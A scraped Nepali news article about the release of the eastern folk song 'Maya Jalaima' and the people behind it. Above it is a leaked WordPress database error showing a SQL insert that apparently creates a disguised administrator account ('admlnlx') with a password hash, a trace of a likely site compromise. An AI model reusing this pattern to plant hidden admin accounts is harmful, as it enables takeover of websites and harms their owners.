WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.CDmIhsnfS3cwJMmaQcvcjDacUqDg/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 09:48:19', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, काठमाडौं । साहित्यकार तथा गीतकार रसिक किरातको शब्दमा रहेको ‘माया जालैमा’ बोलको पूर्वेली लोकभाकाको गीत सार्वजनिक भएको छ ।
पूर्वेली लोकभाकाको अत्यन्त मिठो लयमा रहेको उक्त गीत सङ्गीतकार तथा गायक मनोज साङ्सोनले संगीत सम्योजन गरेका हुन् भने पूर्वाञ्चल सिङ्गिङ् स्टार सिर्जना तामाङ र नितेश राईको स्वार रहेको छ ।
गीतमा माटोको सम्भावना पहिल्याएर त्यसमा समृद्दको फूल फुलाउन सकिने दृढ विश्वास व्यक्त गरिएको छ । यसको लागि नीति निर्माताहरूलाई समेत गीतले सशक्त ढङ्गले झस्काएको छ ।
गीतले पूर्वेली लोकभाकाको विकासमा महत्त्वपूर्ण योगदान गरेको भन्दै अत्यन्त धेरै दर्शक श्रोताहरूको प्रतिक्रिया आइरहेको छ भने, गीतले दर्शक श्रोताहरूको मन जित्न सक्ने गीतकार किरातीको विश्वस रहेको छ ।
https://gaulenews.com/?p=46425
https://gaulenews.com/?p=46296